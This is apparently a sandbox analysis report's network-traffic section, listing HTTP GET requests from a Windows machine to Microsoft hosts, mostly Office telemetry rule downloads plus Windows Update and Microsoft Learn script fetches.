            Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=cW5bTrG1rw+aTtT&MD=dl6frla3 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
            Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule90401v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
            Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
